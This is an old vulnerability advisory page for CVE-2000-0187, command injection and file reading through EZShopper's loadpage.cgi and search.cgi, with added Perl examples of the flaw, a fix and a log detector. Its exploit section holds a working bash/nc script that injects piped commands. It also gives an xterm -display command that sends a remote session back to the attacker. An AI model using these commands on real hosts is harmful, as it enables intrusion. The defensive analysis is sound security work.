EZShopper Remote Command Execution Vulnerability

Vulnerability ID 1105727  Type Input validation
Published 2000-02-27  Updated 2005-10-20
CVE ID CVE-2000-0187
CNNVD ID CNNVD-200002-076
Platform Multiple  CVSS score 7.5
|Sources
https://www.exploit-db.com/exploits/19781
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-076
|Details
The loadpage.cgi CGI script in EZShopper 3.0 allows remote attackers to read arbitrary files via a .. (dot dot) attack, or to execute commands via shell metacharacters.
|Exploit
source: http://www.securityfocus.com/bid/1014/info

EZShopper is a perl-based E-Commerce software package offered by Alex Heiphetz Group, Inc. It is possible to remotely compromise a host due to a lack of checks on user input passed directly to the open() call. This vulnerability exists in two scripts shipped with EZShopper, loadpage.cgi and search.cgi.

In the first vulnerability, the variable passed to open() is called "file" and is submitted to a script called loadpage.cgi. There are no checks on "file", meaning that if "../" precedes an arbitrary filename/path as the file variable, those "../" paths will be followed and the arbitrary file anywhere on the filesystem will be displayed (provided that the uid of the webserver has access to them). If pipes are included in the variable, arbitrary commands can be executed on the target host, possibly giving remote access to the attacker with the uid of the webserver (usually 'nobody').

The second vulnerability is identical in nature to the first but is in the "search.cgi" script. In search.cgi, no checks are made on user input variables 'template' and 'database' (passed to open()). As a result, it is possible to view files or execute commands on the host through search.cgi as well.
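
The root cause described above is Perl's two-argument open(), which derives the open mode from the string it is given: a trailing or leading "|" turns the "file" into a shell command, and ".." components are followed as-is. The following is an added example, not code from EZShopper or from the advisory; the functions load_page_vulnerable and load_page_fixed are hypothetical stand-ins for loadpage.cgi, and the page directory and file contents are constructed for the demonstration.

```perl
#!/usr/bin/perl
# Added example (not EZShopper's code): the unchecked two-argument open()
# pattern the advisory describes, next to a hardened version.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Hypothetical stand-in for loadpage.cgi: the "file" parameter goes straight
# into a two-argument open(). Perl then parses the string itself, so
# "cmd|" (or "|cmd") runs cmd through /bin/sh, and "../../etc/passwd"
# walks out of the page directory.
sub load_page_vulnerable {
    my ($file) = @_;
    open(my $fh, $file) or die "open failed: $!\n";   # 2-arg open: mode taken from $file
    local $/;                                         # slurp whole file / command output
    my $content = <$fh>;
    close $fh;
    return $content;
}

# Hardened version: allow-list the name, anchor it under a fixed directory,
# and use three-argument open() so the mode is never derived from user input.
sub load_page_fixed {
    my ($file, $base) = @_;
    die "rejected file name: $file\n"
        unless $file =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/;   # no '/', '|', spaces, or leading '.'
    my $path = File::Spec->catfile($base, $file);
    open(my $fh, '<', $path) or die "open failed: $!\n";    # explicit read mode, no shell
    local $/;
    my $content = <$fh>;
    close $fh;
    return $content;
}

# Constructed page directory for the demonstration.
my $pages = tempdir(CLEANUP => 1);
open(my $out, '>', "$pages/index.html") or die "$!\n";
print $out "<h1>shop</h1>\n";
close $out;

# Legitimate use works in both versions.
print "vulnerable/legit:  ", load_page_vulnerable("$pages/index.html");
print "fixed/legit:       ", load_page_fixed("index.html", $pages);

# Command injection: the trailing pipe makes open() run the "file" as a command.
print "vulnerable/pipe:   ", load_page_vulnerable("echo pwned|");

# Traversal: the ".." components are followed by open(); extra ".." at "/" are harmless.
my $passwd = load_page_vulnerable("$pages/../../../../../../../../etc/passwd");
print "vulnerable/dotdot: ", (split /\n/, $passwd)[0], "\n";

# The hardened version refuses every one of the attacker-controlled forms.
for my $bad ("echo pwned|", "|echo pwned", "../../../../../../../etc/passwd") {
    eval { load_page_fixed($bad, $pages) };
    print "fixed/rejected:    $@";
}
```

The allow-list regex is deliberately stricter than "strip the pipes": a file name containing "/", whitespace or a leading "." never reaches the filesystem, and the three-argument open() guarantees that whatever does reach it is treated as a path to read, never as a command.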

#!/bin/bash
# Sends the loadpage.cgi request through an HTTP proxy (proxy.server.com:8080);
# $1 is the command to run, placed between pipes in the "file" parameter so
# that the script's open() executes it with the webserver's uid.
echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=|$1| HTTP/1.0\n\n" | nc proxy.server.com 8080

[ /cut ]

$ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%

(this would send an xterm from the target host to wherever display is)

http://www.example.com/cgi-bin/search.cgi?user_id=1&database=<insert here>&template=<or insert here>&distinct=1
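
Both request forms above leave a distinctive trace in web-server access logs: a loadpage.cgi or search.cgi request whose file, template or database parameter carries a pipe, another shell metacharacter, or a ".." component. The following is an added detection example, not part of the advisory; the log lines are constructed in Common Log Format, and the function suspicious_params and the parameter table are assumptions about what to watch, based only on the scripts and parameters named above.

```perl
#!/usr/bin/perl
# Added example (not from the advisory): flag the loadpage.cgi / search.cgi
# request patterns described above in web-server access logs.
use strict;
use warnings;

# Constructed sample lines in Common Log Format (not real traffic).
my @lines = (
    '203.0.113.5 - - [27/Feb/2000:10:01:02 +0000] "GET /cgi-bin/loadpage.cgi?user_id=1&file=index.html HTTP/1.0" 200 512',
    '203.0.113.5 - - [27/Feb/2000:10:01:09 +0000] "GET /cgi-bin/loadpage.cgi?user_id=1&file=|/usr/X11R6/bin/xterm%20-display%20203.0.113.5:0| HTTP/1.0" 200 0',
    '198.51.100.7 - - [27/Feb/2000:10:02:33 +0000] "GET /cgi-bin/loadpage.cgi?user_id=1&file=../../../../etc/passwd HTTP/1.0" 200 1843',
    '198.51.100.7 - - [27/Feb/2000:10:03:10 +0000] "GET /cgi-bin/search.cgi?user_id=1&database=%2e%2e%2f%2e%2e%2fetc%2fpasswd&template=default.html&distinct=1 HTTP/1.0" 200 1843',
    '192.0.2.9 - - [27/Feb/2000:10:04:00 +0000] "GET /cgi-bin/search.cgi?user_id=1&database=products&template=default.html&distinct=1 HTTP/1.0" 200 2048',
);

# Minimal percent-decoding so encoded ".." and "|" are not missed.
sub url_decode {
    my ($s) = @_;
    $s =~ s/\+/ /g;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Parameters that reach open() in the two scripts (per the advisory text).
my %watched = (
    'loadpage.cgi' => [qw(file)],
    'search.cgi'   => [qw(template database)],
);

# Returns the list of "name=value" pairs in one log line that look like an
# attempt to inject a command or to traverse out of the page directory.
sub suspicious_params {
    my ($line) = @_;
    my ($script, $query) =
        $line =~ m{"(?:GET|POST) /cgi-bin/(loadpage\.cgi|search\.cgi)\?([^\s"]*)}
        or return;
    my %param = map {
        my ($k, $v) = split /=/, $_, 2;
        ($k, url_decode($v // ''));
    } split /&/, $query;

    my @hits;
    for my $name (@{ $watched{$script} }) {
        next unless defined $param{$name};
        my $v = $param{$name};
        # shell metacharacters honoured by two-arg open()/sh, or a ".." path component
        push @hits, "$name=$v"
            if $v =~ /[|><;`\$]/ || $v =~ m{(?:\A|/)\.\.(?:/|\z)};
    }
    return @hits;
}

for my $line (@lines) {
    my @hits = suspicious_params($line) or next;
    my ($ip) = $line =~ /^(\S+)/;
    print "ALERT $ip: @hits\n";
}
```

On the constructed input the first and last lines pass silently; the xterm request, the plain "../" read of /etc/passwd and the percent-encoded traversal in the search.cgi database parameter are each reported with the offending parameter value decoded.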
|References

Source: BID
Name: 1014
Link: http://www.securityfocus.com/bid/1014
Source: BUGTRAQ
Name: 20000227 EZShopper 3.0 shopping cart CGI remote command execution
Link: http://archives.neohapsis.com/archives/bugtraq/2000-02/0356.html
